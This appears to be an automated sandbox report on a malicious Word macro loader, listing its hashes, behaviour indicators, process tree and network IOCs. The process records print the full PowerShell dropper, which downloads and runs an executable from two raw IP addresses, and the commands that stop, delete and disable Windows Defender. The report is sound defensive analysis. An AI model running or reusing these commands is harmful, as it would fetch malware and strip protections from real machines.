analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

OrderInfo_4345[2182].doc

Full analysis: https://app.any.run/tasks/0a6de5da-1269-4570-8a4e-c700e6445fc3
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 21:39:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: Windows, Template: Normal, Last Saved By: user, Revision Number: 23, Name of Creating Application: Microsoft Office Word, Total Editing Time: 28:00, Create Time/Date: Thu Nov 8 14:20:00 2018, Last Saved Time/Date: Thu Nov 8 15:35:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

811B34D01436E4E5C693A5E50BAF909F

SHA1:

EB5F6B6B98279F375F9ADE484A9175DCF39470EC

SHA256:

F7A6EF47A178442A6A072B91B28263C0D525CCE589EB2E0D07CEFE46F4E31FA6

SSDEEP:

3072:xkwOaCYzoKh3N9ueZfcg3IDm6gty+5JUg:xy2oC99jSoVQg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2296)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2296)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2748)
      • cmd.exe (PID: 1220)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3112)
    • Application was dropped or rewritten from another process

      • tmp017.exe (PID: 2956)
      • tmp018.exe (PID: 1508)
    • Downloads executable files from IP

      • powershell.exe (PID: 3112)
    • Known privilege escalation attack

      • DllHost.exe (PID: 1280)
    • Loads the Task Scheduler COM API

      • tmp018.exe (PID: 1508)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2760)
      • tmp017.exe (PID: 2956)
      • tmp018.exe (PID: 1508)
    • Creates files in the user directory

      • powershell.exe (PID: 2760)
      • powershell.exe (PID: 3112)
      • tmp017.exe (PID: 2956)
      • powershell.exe (PID: 2404)
      • powershell.exe (PID: 1968)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3112)
      • tmp017.exe (PID: 2956)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1696)
      • cmd.exe (PID: 3548)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 3996)
      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 3464)
      • cmd.exe (PID: 2248)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2296)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2296)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2018:11:08 15:35:00
CreateDate: 2018:11:08 14:20:00
TotalEditTime: 28.0 minutes
Software: Microsoft Office Word
RevisionNumber: 23
LastModifiedBy: user
Template: Normal
Comments: -
Keywords: -
Author: Пользователь Windows
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
20
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe tmp017.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs CMSTPLUA no specs tmp018.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2296"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\OrderInfo_4345[2182].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1220cmd /c powershell "'powershell ""<#start#>function swasi([string] $str1){(new-object system.net.webclient).downloadfile($str1,''%tmp%\tmp017.exe'');<#add info#>start-process ''%tmp%\tmp017.exe'';}try{swasi(''http://46.173.219.64/mald.fox'')}catch{swasi(''http://46.173.213.112/mald.fox'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp289.bat; start-process '%tmp%\tmp289.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2760powershell "'powershell ""<#start#>function swasi([string] $str1){(new-object system.net.webclient).downloadfile($str1,''C:\Users\admin\AppData\Local\Temp\tmp017.exe'');<#add info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp017.exe'';}try{swasi(''http://46.173.219.64/mald.fox'')}catch{swasi(''http://46.173.213.112/mald.fox'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp289.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp289.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2748cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp289.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3112powershell "<#start#>function swasi([string] $str1){(new-object system.net.webclient).downloadfile($str1,'C:\Users\admin\AppData\Local\Temp\tmp017.exe');<#add info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp017.exe';}try{swasi('http://46.173.219.64/mald.fox')}catch{swasi('http://46.173.213.112/mald.fox')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2956"C:\Users\admin\AppData\Local\Temp\tmp017.exe" C:\Users\admin\AppData\Local\Temp\tmp017.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3996/c sc stop WinDefendC:\Windows\system32\cmd.exetmp017.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3240/c sc delete WinDefendC:\Windows\system32\cmd.exetmp017.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1696/c powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\system32\cmd.exetmp017.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
476sc stop WinDefendC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
A tool to aid in developing services for WindowsNT
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 998
Read events
2 360
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
8
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA98A.tmp.cvr
MD5:
SHA256:
2760powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HQKF7UIZIJKUSKGX4N7L.temp
MD5:
SHA256:
3112powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3IY9PKCGXW3ICDGM55T8.temp
MD5:
SHA256:
2404powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q86Q5TMY5A76IQSZEC1B.temp
MD5:
SHA256:
1968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KK0RP527WGIE0GVST497.temp
MD5:
SHA256:
2296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$derInfo_4345[2182].docpgc
MD5:280FBFAD540BEF179D2E01F2B9066D4B
SHA256:ACE07E5175D93CCDBDE9D47657C54AC4E9059BDD0777FABEA0AA267179DF82F6
2760powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db570.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2760powershell.exeC:\Users\admin\AppData\Local\Temp\tmp289.battext
MD5:0863F16F94D0FD6B382945FF11AC928B
SHA256:057FDD44E970174A51FD9C0D49BABF3B707A5E86A8DCFE89E40F25C56649AAE1
2760powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3112powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3112
powershell.exe
GET
200
46.173.219.64:80
http://46.173.219.64/mald.fox
RU
executable
517 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3112
powershell.exe
46.173.219.64:80
Garant-Park-Internet Ltd
RU
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3112
powershell.exe
Misc activity
ET INFO Packed Executable Download
3112
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3112
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3112
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info